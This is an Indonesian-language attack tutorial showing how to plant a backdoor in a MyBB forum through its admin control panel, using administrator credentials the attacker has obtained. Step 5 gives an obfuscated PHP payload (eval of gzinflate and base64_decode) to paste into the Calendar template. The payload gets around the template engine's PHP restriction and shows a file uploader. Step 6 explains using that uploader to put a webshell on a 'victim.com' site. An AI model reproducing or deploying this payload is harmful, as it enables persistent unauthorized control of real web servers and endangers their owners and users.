How to Upload Webshell via MyBB Control Panel


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Sunday, January 2nd, 2011
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


MyBB adalah aplikasi web berbasis PHP untuk forum/bulletin board. Sesuai dengan MyBB wiki, MyBB tidak mengizinkan sembarang code PHP pada templatenya:

“.. PHP is not parsed in templates. The only PHP values accepted are scalar and hash values such as {$myvalue} or {$myvalue['myhash']} ..”

Lalu, bagaimana cara menanam backdoor (upload webshell, file uploader, etc..) jika kita sudah menguasai Admin panelnya? Untungnya dokumentasi tersebut juga menyertakan clue yang bisa dimanfaatkan attacker untuk menanam backdoor. Ikuti panduan berikut ;)

  1. Login ke MyBB control panel dengan username dan password Administrator yang sudah Anda dapakan. Klik menu [Templates and Style]. Anda akan dibawa ke halaman Themes.
    {images: MyBB Themes}

    MyBB Themes

    Perhatikan kotak hijau di sebelah kanan nama theme. Kotak hijau tersebut menandakan bahwa theme tersebut sedang aktif.Klik menu [Templates] pada area navigasi kiri.

  2. Anda kini berada di halaman Template Sets. Karena pada halaman Themes tadi Theme yang aktif adalah Default, maka kini klik [Expand Templates] pada template yang memiliki keterangan “used by Default“.

    {image: Manage Template Sets}

    Manage Template Sets

  3. Kini ada beberapa template yang bisa Anda pilih untuk disisipi backdoor. Klik menu [Expand] milik Calendar Templates.

    {image: Manage Templates}

    Manage Templates

  4. Pada halaman rincian Calendar Templates, klik [Options] milik Calendar, kemudian pilih [Full Edit].

    {image: Edit calendar templates}

    Edit calendar templates

  5. Anda akan disuguhi halaman dengan code editor. Seperti yang sudah saya singgung di paragraf pertama artikel ini, MyBB tidak mengizikan sembarang code PHP. Jika Anda menulis code php pada halaman tersebut, code Anda akan ditampilkan apa adanya a.k.a tidak dijalankan. Untuk itu, silahkan menggunakan SPYROZONE.NET MyBB File Uploader. Salin code berikut, paste sebelum tag <html>
    {${eval(gzinflate(base64_decode('fZJPa9wwEMXvhXyH6VBwFhpr/1xCYntzaWgg0IVtTssSZHlsi9iSkMYpTsh3j3Yd0kBpThrxfvPeMNK6yNabnxsg1VpIsko/gux0Y3JUZJg8FpnuGyitr8jnOEcIXuXYMrsLIQJL1mqRBjd6+2QNpYZYtFI9aNNE1XrZkFjOFwsxX4p+LMt6SJ1pEP7oitscV6slQku6aTnHxeo8xpW+yGrre+iJW1vl6GxgBDKKR0c59kPH2knP4kCdVZLlYUjjBoaJqHVHCEb273XQT7Fenr+Dk3gce3CdlRW+9Yah7HWMe5TdEK93k1hkx7B4xAUVyeXJF12ffrvf/Nr+3iUfXJL97DkqV8q6MerXN7c/trvkMEOy3yXcu/tDcLL/Dqikaklg+g81EbPZ8/FJMCuL/0IpwpRLFYRBKQqhHrpu/JqJ8rhIvHyhLtBfq2sZDSpg+9YIn3h/MHmBdfwnrw==')))}}
    
    {image: Copy-Paste SPYROZONE.NET MyBB File Uploader}

    Copy-Paste SPYROZONE.NET MyBB File Uploader

    Klik [Save and Continue Editing] untuk menyimpan perubahan yang sudah Anda lakukan.

  6. Kini bukalah halaman utama forum, lalu pergilah ke halaman Calendar (victim.com/mybbfolder/calendar.php). SPYROZONE.NET MyBB File Uploader akan tampil diatas header forum ^^ Silahkan upload Webshell Anda mengunakan file uploader tersebut :D
    {image: Upload Backdoor}

    Upload Backdoor

    Jika upload berhasil dilakukan, file Anda akan tersimpan pada folder cache (victim.com/mybbfolder/cache/your-file.php).

Semoga bermanfaat ;)


//E.O.F